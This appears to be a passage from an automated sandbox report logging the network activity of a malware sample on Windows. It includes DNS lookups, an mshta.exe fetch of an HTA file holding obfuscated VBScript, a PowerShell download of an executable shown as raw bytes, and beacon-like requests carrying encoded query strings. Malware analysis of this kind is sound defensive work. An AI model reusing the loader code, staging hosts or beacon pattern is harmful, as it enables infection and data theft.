                                                          May 23, 2024 20:24:07.370841026 CEST8049758185.237.107.49192.168.2.8
                                                          May 23, 2024 20:24:07.371077061 CEST4975880192.168.2.8185.237.107.49
                                                          May 23, 2024 20:24:09.992134094 CEST8049759185.237.107.49192.168.2.8
                                                          May 23, 2024 20:24:09.995505095 CEST4975980192.168.2.8185.237.107.49
                                                          May 23, 2024 20:24:09.999295950 CEST4975980192.168.2.8185.237.107.49
                                                          May 23, 2024 20:24:10.009274960 CEST8049759185.237.107.49192.168.2.8
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 23, 2024 20:20:46.057706118 CEST5230953192.168.2.81.1.1.1
                                                          May 23, 2024 20:20:46.491764069 CEST53523091.1.1.1192.168.2.8
                                                          May 23, 2024 20:21:02.456902981 CEST6460753192.168.2.81.1.1.1
                                                          May 23, 2024 20:21:03.003942013 CEST53646071.1.1.1192.168.2.8
                                                          May 23, 2024 20:21:16.552138090 CEST5613253192.168.2.81.1.1.1
                                                          May 23, 2024 20:21:16.987751961 CEST53561321.1.1.1192.168.2.8
                                                          May 23, 2024 20:21:30.847281933 CEST6313453192.168.2.81.1.1.1
                                                          May 23, 2024 20:21:31.026698112 CEST53631341.1.1.1192.168.2.8
                                                          May 23, 2024 20:21:45.911554098 CEST6187553192.168.2.81.1.1.1
                                                          May 23, 2024 20:21:46.152642012 CEST53618751.1.1.1192.168.2.8
                                                          May 23, 2024 20:21:59.646673918 CEST5576553192.168.2.81.1.1.1
                                                          May 23, 2024 20:21:59.703707933 CEST53557651.1.1.1192.168.2.8
                                                          May 23, 2024 20:22:13.451958895 CEST6114153192.168.2.81.1.1.1
                                                          May 23, 2024 20:22:13.503710985 CEST53611411.1.1.1192.168.2.8
                                                          May 23, 2024 20:22:21.581341028 CEST5342253192.168.2.81.1.1.1
                                                          May 23, 2024 20:22:21.613317013 CEST53534221.1.1.1192.168.2.8
                                                          May 23, 2024 20:22:35.395473957 CEST5981553192.168.2.81.1.1.1
                                                          May 23, 2024 20:22:35.487128019 CEST53598151.1.1.1192.168.2.8
                                                          May 23, 2024 20:22:49.019785881 CEST6013853192.168.2.81.1.1.1
                                                          May 23, 2024 20:22:49.348720074 CEST53601381.1.1.1192.168.2.8
                                                          May 23, 2024 20:23:02.581502914 CEST6002553192.168.2.81.1.1.1
                                                          May 23, 2024 20:23:03.577930927 CEST6002553192.168.2.81.1.1.1
                                                          May 23, 2024 20:23:03.962445021 CEST53600251.1.1.1192.168.2.8
                                                          May 23, 2024 20:23:03.962706089 CEST53600251.1.1.1192.168.2.8
                                                          May 23, 2024 20:23:26.393826008 CEST5827353192.168.2.81.1.1.1
                                                          May 23, 2024 20:23:26.599025011 CEST53582731.1.1.1192.168.2.8
                                                          May 23, 2024 20:23:40.644974947 CEST5049953192.168.2.81.1.1.1
                                                          May 23, 2024 20:23:40.845534086 CEST53504991.1.1.1192.168.2.8
                                                          May 23, 2024 20:24:15.007797003 CEST6425453192.168.2.81.1.1.1
                                                          May 23, 2024 20:24:15.017591953 CEST53642541.1.1.1192.168.2.8
                                                          May 23, 2024 20:24:19.853724003 CEST6259353192.168.2.81.1.1.1
                                                          May 23, 2024 20:24:19.864794016 CEST53625931.1.1.1192.168.2.8
                                                          May 23, 2024 20:24:24.878612041 CEST5374653192.168.2.81.1.1.1
                                                          May 23, 2024 20:24:24.969774008 CEST53537461.1.1.1192.168.2.8
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          May 23, 2024 20:20:46.057706118 CEST192.168.2.81.1.1.10x1f37Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:02.456902981 CEST192.168.2.81.1.1.10xee41Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:16.552138090 CEST192.168.2.81.1.1.10xb39Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:30.847281933 CEST192.168.2.81.1.1.10xf05dStandard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:45.911554098 CEST192.168.2.81.1.1.10x4aa2Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:59.646673918 CEST192.168.2.81.1.1.10x8698Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:13.451958895 CEST192.168.2.81.1.1.10xb8e4Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:21.581341028 CEST192.168.2.81.1.1.10x8705Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:35.395473957 CEST192.168.2.81.1.1.10xa65cStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:49.019785881 CEST192.168.2.81.1.1.10x4c99Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:02.581502914 CEST192.168.2.81.1.1.10x5a88Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:03.577930927 CEST192.168.2.81.1.1.10x5a88Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:26.393826008 CEST192.168.2.81.1.1.10x532eStandard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:40.644974947 CEST192.168.2.81.1.1.10x77caStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:24:15.007797003 CEST192.168.2.81.1.1.10x6313Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:24:19.853724003 CEST192.168.2.81.1.1.10x9dfaStandard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:24:24.878612041 CEST192.168.2.81.1.1.10x6a17Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          May 23, 2024 20:20:46.491764069 CEST1.1.1.1192.168.2.80x1f37No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:03.003942013 CEST1.1.1.1192.168.2.80xee41No error (0)www.kasegitai.tokyo202.172.28.202A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:16.987751961 CEST1.1.1.1192.168.2.80xb39No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:31.026698112 CEST1.1.1.1192.168.2.80xf05dNo error (0)www.antonio-vivaldi.mobi46.30.213.191A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:46.152642012 CEST1.1.1.1192.168.2.80x4aa2No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          May 23, 2024 20:21:46.152642012 CEST1.1.1.1192.168.2.80x4aa2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          May 23, 2024 20:21:46.152642012 CEST1.1.1.1192.168.2.80x4aa2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:21:59.703707933 CEST1.1.1.1192.168.2.80x8698No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:13.503710985 CEST1.1.1.1192.168.2.80xb8e4Server failure (2)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:21.613317013 CEST1.1.1.1192.168.2.80x8705No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:35.487128019 CEST1.1.1.1192.168.2.80xa65cNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                          May 23, 2024 20:22:35.487128019 CEST1.1.1.1192.168.2.80xa65cNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:22:49.348720074 CEST1.1.1.1192.168.2.80x4c99No error (0)www.donnavariedades.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                          May 23, 2024 20:22:49.348720074 CEST1.1.1.1192.168.2.80x4c99No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:03.962445021 CEST1.1.1.1192.168.2.80x5a88No error (0)www.660danm.top34.111.148.214A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:03.962445021 CEST1.1.1.1192.168.2.80x5a88No error (0)www.660danm.top34.120.249.181A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:03.962706089 CEST1.1.1.1192.168.2.80x5a88No error (0)www.660danm.top34.111.148.214A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:03.962706089 CEST1.1.1.1192.168.2.80x5a88No error (0)www.660danm.top34.120.249.181A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:26.599025011 CEST1.1.1.1192.168.2.80x532eNo error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                          May 23, 2024 20:23:26.599025011 CEST1.1.1.1192.168.2.80x532eNo error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:23:40.845534086 CEST1.1.1.1192.168.2.80x77caNo error (0)www.joyesi.xyz185.237.107.49A (IP address)IN (0x0001)false
                                                          May 23, 2024 20:24:15.017591953 CEST1.1.1.1192.168.2.80x6313Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:24:19.864794016 CEST1.1.1.1192.168.2.80x9dfaName error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                          May 23, 2024 20:24:24.969774008 CEST1.1.1.1192.168.2.80x6a17No error (0)www.shenzhoucui.com104.206.198.212A (IP address)IN (0x0001)false
                                                          • 20.86.128.223
                                                          • www.3xfootball.com
                                                          • www.kasegitai.tokyo
                                                          • www.goldenjade-travel.com
                                                          • www.antonio-vivaldi.mobi
                                                          • www.magmadokum.com
                                                          • www.rssnewscast.com
                                                          • www.techchains.info
                                                          • www.elettrosistemista.zip
                                                          • www.donnavariedades.com
                                                          • www.660danm.top
                                                          • www.empowermedeco.com
                                                          • www.joyesi.xyz
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.84970520.86.128.223807268C:\Windows\System32\mshta.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:20:12.581518888 CEST331OUTGET /room/room4.hta HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-CH
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                          Host: 20.86.128.223
                                                          Connection: Keep-Alive
                                                          May 23, 2024 20:20:13.193768024 CEST1236INHTTP/1.1 200 OK
                                                          Date: Thu, 23 May 2024 18:20:13 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                          Last-Modified: Thu, 23 May 2024 13:22:42 GMT
                                                          ETag: "27b0-6191ef226f704"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 10160
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Raw: 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 76 42 73 43 52 49 50 54 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 4a 62 71 41 46 50 63 77 48 77 28 42 79 56 61 6c 20 46 43 73 53 29 0d 0a 20 20 20 44 69 6d 20 73 50 69 45 45 68 47 57 70 50 64 6b 55 0d 0a 20 20 20 44 69 6d 20 55 55 55 71 65 0d 0a 20 20 20 20 55 55 55 71 65 20 3d 20 33 39 33 34 31 0d 0a 20 20 20 20 44 69 6d 20 49 4a 47 73 4e 79 53 72 56 0d 0a 20 20 20 49 4a 47 73 4e 79 53 72 56 20 3d 20 4a 62 66 43 75 28 46 43 73 53 29 0d 0a 20 20 20 20 20 20 20 20 49 66 20 49 4a 47 73 4e 79 53 72 56 20 3d 20 37 30 30 30 20 2b 20 31 32 30 34 20 54 68 65 6e 0d 0a 20 20 20 20 46 6f 72 20 45 61 63 68 20 73 50 69 45 45 68 47 57 70 50 64 6b 55 20 49 6e 20 46 43 73 53 0d 0a 20 20 20 44 69 6d 20 72 4f 5a 69 48 0d 0a 20 20 20 20 20 20 20 20 20 72 4f 5a 69 48 20 3d 20 72 4f 5a 69 48 20 26 20 43 68 72 28 73 50 69 45 45 68 47 57 70 50 64 6b 55 20 2d 20 55 55 55 71 65 29 0d 0a 20 20 20 20 20 20 4e [TRUNCATED]
                                                          Data Ascii: <head><script language="vBsCRIPT">Function JbqAFPcwHw(ByVal FCsS) Dim sPiEEhGWpPdkU Dim UUUqe UUUqe = 39341 Dim IJGsNySrV IJGsNySrV = JbfCu(FCsS) If IJGsNySrV = 7000 + 1204 Then For Each sPiEEhGWpPdkU In FCsS Dim rOZiH rOZiH = rOZiH & Chr(sPiEEhGWpPdkU - UUUqe) Next End If JbqAFPcwHw = rOZiHEnd FunctionFunction UiwrQqNceuOJO() Dim FCsS Dim nlbWVu FCsS = Array(39453,39452,39460,39442,39455,39456,39445,39442,39449,39449,39387,39442,39461,39442,39373,39386,39410,39461,39442,39440,39458,39457,39446,39452,39451,39421,39452,39449,39446,39440,39462,39373,39426,39451,39423,39442,39456,39457,39455,39446,39440,39457,39442,39441,39373,39443,39458,39451,39440,39457,39446,39452,39451,39373,39417,39422,39445,39449,39445,39381,39377,39446,39406,39429,39420,39426,39451,39447,39422,39385,39373,39377,39439,39447,39412,39440,39413,39410,39439,3938
                                                          May 23, 2024 20:20:13.193788052 CEST224INData Raw: 32 2c 33 39 34 36 34 2c 33 39 34 33 32 2c 33 39 34 31 34 2c 33 39 34 32 30 2c 33 39 33 38 37 2c 33 39 34 31 31 2c 33 39 34 34 36 2c 33 39 34 34 39 2c 33 39 34 34 32 2c 33 39 34 33 34 2c 33 39 33 39 39 2c 33 39 33 39 39 2c 33 39 34 32 38 2c 33 39
                                                          Data Ascii: 2,39464,39432,39414,39420,39387,39411,39446,39449,39442,39434,39399,39399,39428,39455,39446,39457,39442,39406,39449,39449,39407,39462,39457,39442,39456,39381,39377,39446,39406,39429,39420,39426,39451,39447,39422,39385,39373,
                                                          May 23, 2024 20:20:13.195055008 CEST1236INData Raw: 33 39 33 37 37 2c 33 39 34 33 39 2c 33 39 34 34 37 2c 33 39 34 31 32 2c 33 39 34 34 30 2c 33 39 34 31 33 2c 33 39 34 31 30 2c 33 39 34 33 39 2c 33 39 33 38 32 2c 33 39 34 36 36 2c 33 39 34 30 30 2c 33 39 34 34 33 2c 33 39 34 35 38 2c 33 39 34 35
                                                          Data Ascii: 39377,39439,39447,39412,39440,39413,39410,39439,39382,39466,39400,39443,39458,39451,39440,39457,39446,39452,39451,39373,39463,39448,39448,39452,39420,39409,39451,39448,39441,39420,39429,39449,39455,39381,39377,39446,39406,39429,39420,39426,394
                                                          May 23, 2024 20:20:13.195071936 CEST1236INData Raw: 33 39 33 38 32 2c 33 39 33 37 33 2c 33 39 33 38 36 2c 33 39 34 34 32 2c 33 39 34 35 34 2c 33 39 33 37 33 2c 33 39 33 37 37 2c 33 39 34 32 35 2c 33 39 34 35 35 2c 33 39 34 35 38 2c 33 39 34 34 32 2c 33 39 33 38 32 2c 33 39 34 36 34 2c 33 39 34 35
                                                          Data Ascii: 39382,39373,39386,39442,39454,39373,39377,39425,39455,39458,39442,39382,39464,39453,39452,39460,39442,39455,39456,39445,39442,39449,39449,39387,39442,39461,39442,39373,39386,39410,39461,39442,39440,39458,39457,39446,39452,39451,39421,39452,394
                                                          May 23, 2024 20:20:13.197567940 CEST1236INData Raw: 33 39 34 30 30 2c 33 39 34 34 33 2c 33 39 34 35 38 2c 33 39 34 35 31 2c 33 39 34 34 30 2c 33 39 34 35 37 2c 33 39 34 34 36 2c 33 39 34 35 32 2c 33 39 34 35 31 2c 33 39 33 37 33 2c 33 39 34 34 33 2c 33 39 34 33 39 2c 33 39 34 32 36 2c 33 39 34 36
                                                          Data Ascii: 39400,39443,39458,39451,39440,39457,39446,39452,39451,39373,39443,39439,39426,39462,39456,39414,39459,39415,39453,39426,39463,39409,39415,39439,39444,39457,39381,39377,39428,39442,39458,39421,39457,39406,39460,39407,39455,39412,39458,39425,394
                                                          May 23, 2024 20:20:13.210746050 CEST1236INData Raw: 33 39 34 34 32 2c 33 39 34 34 30 2c 33 39 34 35 38 2c 33 39 34 35 35 2c 33 39 34 34 36 2c 33 39 34 35 37 2c 33 39 34 36 32 2c 33 39 34 32 31 2c 33 39 34 35 35 2c 33 39 34 35 32 2c 33 39 34 35 37 2c 33 39 34 35 32 2c 33 39 34 34 30 2c 33 39 34 35
                                                          Data Ascii: 39442,39440,39458,39455,39446,39457,39462,39421,39455,39452,39457,39452,39440,39452,39449,39373,39402,39373,39432,39419,39442,39457,39387,39424,39442,39440,39458,39455,39446,39457,39462,39421,39455,39452,39457,39452,39440,39452,39449,39425,394
                                                          May 23, 2024 20:20:13.210764885 CEST1236INData Raw: 33 39 34 32 39 2c 33 39 34 30 32 2c 33 39 33 37 37 2c 33 39 34 31 39 2c 33 39 34 35 38 2c 33 39 34 34 39 2c 33 39 34 34 39 2c 33 39 34 30 30 2c 33 39 34 34 33 2c 33 39 34 35 32 2c 33 39 34 35 35 2c 33 39 34 34 32 2c 33 39 34 33 38 2c 33 39 34 34
                                                          Data Ascii: 39429,39402,39377,39419,39458,39449,39449,39400,39443,39452,39455,39442,39438,39440,39445,39381,39377,39422,39419,39415,39446,39458,39423,39409,39456,39373,39446,39451,39373,39377,39442,39425,39413,39450,39420,39440,39416,39454,39414,39426,393
                                                          May 23, 2024 20:20:13.210779905 CEST552INData Raw: 33 39 34 33 38 2c 33 39 33 38 37 2c 33 39 34 34 32 2c 33 39 34 36 31 2c 33 39 34 34 32 2c 33 39 33 38 30 2c 33 39 34 30 30 2c 33 39 33 37 33 2c 33 39 34 34 36 2c 33 39 34 34 33 2c 33 39 33 37 33 2c 33 39 33 38 31 2c 33 39 34 32 35 2c 33 39 34 34
                                                          Data Ascii: 39438,39387,39442,39461,39442,39380,39400,39373,39446,39443,39373,39381,39425,39442,39456,39457,39386,39421,39438,39457,39445,39373,39386,39421,39438,39457,39445,39373,39377,39443,39417,39438,39452,39441,39382,39464,39463,39448,39448,39452,394
                                                          May 23, 2024 20:20:13.210794926 CEST1236INData Raw: 33 39 33 37 33 2c 33 39 33 38 31 2c 33 39 34 31 36 2c 33 39 34 34 34 2c 33 39 34 32 32 2c 33 39 34 31 34 2c 33 39 34 34 32 2c 33 39 34 35 39 2c 33 39 34 33 31 2c 33 39 34 31 35 2c 33 39 34 36 31 2c 33 39 33 37 33 2c 33 39 34 30 35 2c 33 39 33 38
                                                          Data Ascii: 39373,39381,39416,39444,39422,39414,39442,39459,39431,39415,39461,39373,39405,39381,39393,39396,39390,39397,39392,39385,39393,39396,39390,39398,39394,39385,39393,39396,39390,39398,39394,39385,39393,39396,39390,39398,39390,39385,39393,39396,393
                                                          May 23, 2024 20:20:13.210808992 CEST1019INData Raw: 33 39 33 39 33 2c 33 39 33 39 36 2c 33 39 33 39 30 2c 33 39 33 39 37 2c 33 39 33 38 39 2c 33 39 33 38 35 2c 33 39 33 39 33 2c 33 39 33 39 36 2c 33 39 33 39 30 2c 33 39 33 39 38 2c 33 39 33 39 38 2c 33 39 33 38 35 2c 33 39 33 39 33 2c 33 39 33 39
                                                          Data Ascii: 39393,39396,39390,39397,39389,39385,39393,39396,39390,39398,39398,39385,39393,39396,39390,39397,39389,39382,39382,39400,39417,39422,39445,39449,39445,39373,39377,39443,39417,39438,39452,39441,39373,39377,39450,39452,39459,39416,39451,39458,394


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.84970620.86.128.223807388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:20:16.545011044 CEST77OUTGET /room/rooma.exe HTTP/1.1
                                                          Host: 20.86.128.223
                                                          Connection: Keep-Alive
                                                          May 23, 2024 20:20:17.156924009 CEST1236INHTTP/1.1 200 OK
                                                          Date: Thu, 23 May 2024 18:20:17 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                          Last-Modified: Thu, 23 May 2024 10:27:58 GMT
                                                          ETag: "42200-6191c8140a322"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 270848
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdownload
                                                          Data Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 c1 68 85 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 10 04 00 00 00 00 00 00 00 00 00 d0 15 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                          Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$y=`g=`g=`g:`g<`g<`gRich=`gPELh_ @ @.text `
                                                          May 23, 2024 20:20:17.157037973 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          May 23, 2024 20:20:17.157419920 CEST448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          May 23, 2024 20:20:17.157764912 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          May 23, 2024 20:20:17.157777071 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          May 23, 2024 20:20:17.158113003 CEST1236INData Raw: 03 d1 c1 fa 03 8b ca c1 e9 1f 03 ca 75 eb 8b 5d 08 81 fb 23 10 00 00 0f 85 85 00 00 00 b8 29 8d 8f 4c f7 6d fc c1 fa 06 8b c2 c1 e8 1f 03 c2 89 45 fc 75 e9 0f 57 c0 c7 45 d4 1d 0f 59 00 c7 45 d8 00 f4 4a c4 66 c7 45 dc db 00 66 0f d6 45 de 66 0f
                                                          Data Ascii: u]#)LmEuWEYEJfEfEfEfu2bmEuM~EEf~EfA~E_fAA^Y[]uv3E=mEKEBEEafE=EfE*SmEu
                                                          May 23, 2024 20:20:17.158127069 CEST1236INData Raw: 8b c2 c1 e8 1f 03 c2 89 45 bc 75 e9 b9 80 68 00 00 8d 64 24 00 b8 89 88 88 88 f7 e9 03 d1 c1 fa 04 8b ca c1 e9 1f 03 ca 75 eb 85 f6 0f 88 f5 05 00 00 f6 85 08 fe ff ff 40 0f 85 83 00 00 00 8d 85 dc fc ff ff 50 68 b2 1d 00 00 e8 a5 f9 ff ff 83 c4
                                                          Data Ascii: Euhd$u@Phic?I;LHuPjP15mEujjP<hPLd3<3t}3IMt$
                                                          May 23, 2024 20:20:17.158138990 CEST1236INData Raw: 8b c2 c1 e8 1f 03 c2 89 45 b8 75 e9 b8 48 23 00 00 48 75 fd 8d 85 14 fd ff ff 68 bb f8 b2 25 50 e8 3c 01 00 00 83 c4 08 eb 07 8d a4 24 00 00 00 00 b8 79 78 78 78 f7 6d b0 c1 fa 06 8b c2 c1 e8 1f 03 c2 89 45 b0 75 e9 8b 8d 78 fe ff ff 85 c9 74 54
                                                          Data Ascii: EuH#Huh%P<$yxxxmEuxtTdo(uxPhQ3$K4pumNuFE3ByIAuc|P
                                                          May 23, 2024 20:20:17.159049034 CEST1236INData Raw: 75 eb 33 c0 3a 8c 07 a0 01 00 00 74 07 40 3b c6 76 f2 eb 02 32 c9 b8 92 13 00 00 8b ff 48 75 fd 84 c9 74 08 88 8c 37 a0 01 00 00 46 b8 70 62 00 00 48 75 fd 8b 47 34 48 3b f0 0f 82 6e ff ff ff b8 eb 07 1d 15 f7 6d fc c1 fa 04 8b c2 c1 e8 1f 03 c2
                                                          Data Ascii: u3:t@;v2Hut7FpbHuG4H;nmEujKejPddPW_lfEEES\E/02~EfE^TTEt%~EfCE)%~E2fCC]K3Id@Jr
                                                          May 23, 2024 20:20:17.161684036 CEST1236INData Raw: 32 00 00 8d 9b 00 00 00 00 b8 f7 12 da 4b f7 ee c1 fa 06 8b f2 c1 ee 1f 03 f2 75 ed 33 db 43 b8 ab aa aa 2a f7 eb 8b c2 c1 e8 1f 03 c2 8d 0c 40 03 c9 8b c3 2b c1 75 03 83 c3 02 81 fb a1 41 00 00 7c db bb f5 2f 00 00 bf 22 31 00 00 b8 5b 3d 3b 04
                                                          Data Ascii: 2Ku3C*@+uA|/"1[=;u/=OIulS0uq=u%yH@uFs|#10u}
                                                          May 23, 2024 20:20:17.164158106 CEST1236INData Raw: f3 51 96 d5 5f 55 8b ec 83 ec 08 53 56 57 c7 45 f8 00 00 00 00 bf 98 5a 00 00 33 f6 46 b8 67 66 66 66 f7 ee d1 fa 8b c2 c1 e8 1f 03 c2 8b ce 8d 04 80 2b c8 75 01 46 81 fe fc 11 00 00 7c dd b9 44 26 00 00 ba b0 00 00 00 be 34 44 00 00 b8 22 00 00
                                                          Data Ascii: Q_USVWEZ3Fgfff+uF|D&4D"=LIuHbuQEM~DtiytZPq0TM}+MMMt O


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.849714154.215.72.110803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:20:46.506604910 CEST520OUTGET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.3xfootball.com
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:20:47.411325932 CEST691INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Thu, 23 May 2024 18:20:47 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 548
                                                          Connection: close
